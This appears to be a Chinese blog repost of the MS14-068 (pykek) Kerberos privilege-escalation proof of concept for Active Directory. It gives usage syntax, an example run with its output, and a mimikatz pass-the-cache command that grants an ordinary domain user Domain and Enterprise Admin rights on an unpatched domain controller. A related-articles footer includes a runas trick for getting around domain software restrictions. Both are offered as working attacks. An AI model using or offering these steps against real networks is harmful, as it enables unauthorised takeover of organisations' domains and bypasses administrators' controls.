MS14-068 任何域内用户提升为域管理员PoC -中国寒龙

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)

USAGE:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS:

-p <clearPassword>

--rc4 <ntlmHash>

Example usage :

Linux (tested with samba and MIT Kerberos)

[email protected]:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

Password:

[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!

[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!

[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!

[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!

[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!

[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!

[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!

[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!

[+] Creating ccache file ‘‘[email protected]‘‘... Done!

[email protected]:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0

On Windows

1

2

python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

mimikatz.exe "kerberos::ptc [email protected]" exit`

提供的py脚本
MS14-068.py

附加转为exe后的程序

ms14-068.exe

时间: 2024-12-15 11:11:51

MS14-068 任何域内用户提升为域管理员PoC -中国寒龙的相关文章

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员 http://zone.wooyun.org/content/17102 https://www.t00ls.net/thread-28706-1-1.html https://github.com/bidord/pykek ms14-068.py Exploits MS14-680 vulnerability on an un-patched domain controler of an A

域普通用户提升权限(管理员的权限)

现在大部分公司都使用域,运用组策略设置禁止某些软件运行,比如QQ.微信等等: 现在教大家怎么提升权限使用这些软件: 接下来要运用到runas命令,新建一个文档,在文档里面输入 没有加入域的:runas /env /savecred /user:administrator  “程序路径” 如果加入域的:runas /env /savecred /user:domain\administrator  “程序路径” domain:写加入的域名 adminstrator:管理员的用户名(不一定是admi

IIS Windows身份认证避免corp域内用户输入用户名和密码的方法

步骤: 1. 设置IIS站点身份认证 2. 站点的物理路径添加Everyone用户

域内信息的收集

0X01简单命令的介绍 nslookup 域名(zhongqi.com) 查看DCip 和 systeminfo net time /domain 这是不存在域的情况 域内存活主机的探测(白天探测 网上在探测 寻找规律) 这个很菜 只能一个一个的手动探测 我们换一个把 额 我错了 是我垃圾啊 不会用 把ip改成192.138.1.1-254就行了 接下来我们进行域内的端口扫描(通过查看存活主机的开放端口 分析主机) 速度慢不要紧 动作一定要小 可以同telent进行扫描 查询域内的情况 机器 n

思科路由器配合域内Radius服务器完成VPN用户身份认证

背景介绍: 公司有一个域环境,路由器Wan地址为:a.b.c.d,Lan地址为:192.168.30.1,其余服务器地址如图所示,其中VPN服务器需要2块网卡,第2块网卡的地址为172.16.0.1使用NAT转换通过192.168.30.5访问外网,给使用VPN登陆的客户端指定IP地址为10.0.0.1-10.0.0.100,为了方便管理,实现账号的单一登陆,搭建了Radius服务器,下面就来介绍如何使用思科路由器配合域内Radius服务器完成VPN用户身份认证. 路由器设置: 登陆路由器,首先

PHP 获得域控内用户的计算机登录名

一个需求: 在域控范围获得访问用户的计算机名.方法: 1.测试软件环境: XAMPP Control Panel V3.2.1 ,  Apache version 2.4.7 2.Apache 2.2 使用 mod_auth_sspi.so 模块,Apache 2.4 以后此模块不再适用,使用mod_authnz_sspi 模块. 二.安装 1.下载mod_authnz_sspi 模块.(x86 for 32bit apache, x64 for 64 bit apche ) Download

域内计算机迁移到其他域,自动脚本运行,继承原用户配置文件、管理员权限不变

因一个公司收购另外一个公司,现需要把被收购公司的计算机迁移到收购公司域内,要求用户配置文件不变,计算机名重新编辑,用户继承本地管理员权限使用了DefProf.exe迁移配置文件使用了netdom.exe迁移域使用了数据库自动计算机名更改,并抓取计算机信息到数据库 脚本如下: @echo off color 0Acls copy CDGAMED.ps1 C:\tmpcopy CDGAMEL.ps1 C:\tmpcopy zhuaqu.ps1 C:\tmpcopy netdom.exe C:\Win

server 2003 跨域迁移用户计算机详解

以下内容适合新手,如有大侠路过,看到文章有纰漏或者不详细的地方请私信我,我做修改后给大家提供参考,另外转载的话请注明出处,方便有疑问或者提供在迁移中遇到问题的网友来咨询,另外也欢迎大家把迁移中遇到的问题以及解决方法发给我,我会加入到文档中方便大家参考,谢谢 我介绍一下我的个人环境,我搭建了两个单林单域的服务器A和B  服务器名取名为 testA 和testB 都为Windows server 2003  A服务器域名为:contoso.com    B服务器域名为:contosob.com B服

Windows server 2012 域控制器之间角色转移及清理域控方法,实现辅助域控提升为主域控

本章博文讲述Windows server 2012 域控制器之间角色转移及删除域控方法 .针对不同的应用场景,对操作方法进行了归纳与总结   . 下面分2种场景做介绍  : 场景1:主域控制器与辅助域控制器运行正常,相互间可以实现AD复制功能.需要把辅助域控制器提升为主域控制器 ,把主域控制器降级为普通成员服务器:这种场景一般应用到原主域控制器进行系统升级(先转移域角色,再降级,再安装或升级高版本系统,再次转移角色恢复到主域控制器角色)或使用配置更高的服务器替代原主域控制器起到主域控制的作用(使